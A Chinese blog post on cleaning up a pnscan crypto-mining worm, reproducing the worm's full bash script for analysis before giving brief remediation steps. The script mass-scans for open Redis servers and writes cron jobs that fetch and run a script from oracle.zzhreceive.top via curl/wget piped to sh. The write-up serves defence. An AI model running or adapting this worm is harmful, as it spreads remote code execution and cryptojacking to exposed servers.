pnscan 挖矿蠕虫病毒处理记(二)

在一的文章中,扫描的程序讲解了,但是真正的Boss(pnscan 挖矿)还没有解决,接下来继续:

 

机器安装了阿里云的动态感知,扫描到挖矿程序。

 查看文件,发现这是一个脚本,先不要急于清理,先研究它的运行逻辑,发现有检测机制,文件会自动下载,像这种,强烈建议做一个域名本地解释(hosts)。

#!/bin/bash
setenforce 0 2>/dev/null
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
sleep 1
    if [ -f "/bin/ps.original" ]
    then
        ps.original -fe|grep pnscan |grep -v grep
    else
        ps -fe|grep pnscan |grep -v grep
    fi
if [ $? -ne 0 ]
then
	rm -rf .dat .shard .ranges .lan 2>/dev/null
	sleep 1
	echo 'config set dbfilename "backup.db"' > .dat
	echo 'save' >> .dat
	echo 'config set stop-writes-on-bgsave-error no' >> .dat
	echo 'flushall' >> .dat
	echo 'set backup1 "\n\n\n*/2 * * * * cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
	echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
	echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
	echo 'set backup4 "\n\n\n*/5 * * * * wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
	echo 'config set dir "/var/spool/cron/"' >> .dat
	echo 'config set dbfilename "root"' >> .dat
	echo 'save' >> .dat
	echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
	echo 'save' >> .dat
	echo 'flushall' >> .dat
	echo 'set backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
	echo 'set backup2 "\n\n\n*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
	echo 'set backup3 "\n\n\n*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
	echo 'set backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
	echo 'config set dir "/etc/cron.d/"' >> .dat
	echo 'config set dbfilename "zzh"' >> .dat
	echo 'save' >> .dat
	echo 'config set dir "/etc/"' >> .dat
	echo 'config set dbfilename "crontab"' >> .dat
	echo 'save' >> .dat
	sleep 1
	pnx=pnscan
	[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
	[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
	for z in $( seq 0 5000 | sort -R ); do
	for x in $( echo -e "47\n39\n8\n121\n106\n120\n123\n65\n3\n101\n139\n99\n63\n81\n44\n18\n119\n100\n42\n49\n118\n54\n1\n50\n114\n182\n52\n13\n34\n112\n115\n111\n116\n16\n35\n117\n124\n59\n36\n103\n82\n175\n122\n129\n45\n152\n159\n113\n15\n61\n180\n172\n157\n60\n218\n176\n58\n204\n140\n184\n150\n193\n223\n192\n75\n46\n188\n183\n222\n14\n104\n27\n221\n211\n132\n107\n43\n212\n148\n110\n62\n202\n95\n220\n154\n23\n149\n125\n210\n203\n185\n171\n146\n109\n94\n219\n134" | sort -R ); do
	for y in $( seq 0 255 | sort -R ); do
	$pnx -t256 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o
	awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l
	while read -r h p; do
	cat .dat | redis-cli -h $h -p $p --raw &
	done < .r.$x.$y.l
	done
	done
        done
	sleep 1
	masscan --max-rate 10000 -p6379 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard
	sleep 1
	while read -r h p; do
	cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
	done < .shard
	sleep 1
	masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges
	sleep 1
	while read -r h p; do
	cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
	done < .ranges
	sleep 1
	ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet
	sleep 1
	masscan --max-rate 10000 -p6379 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan
	sleep 1
	while read -r h p; do
	cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
	done < .lan
	sleep 60
	rm -rf .dat .shard .ranges .lan 2>/dev/null
else
	echo "root runing....."
fi

看到有下载操作,先做hosts, 不让再通讯

vim /etc/hosts

127.0.0.1 oracle.zzhreceive.top

把脚本删除 rm  \[scan\]

再把/bin/ps.original文件删除,删了之后,发现ps命令不让用

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值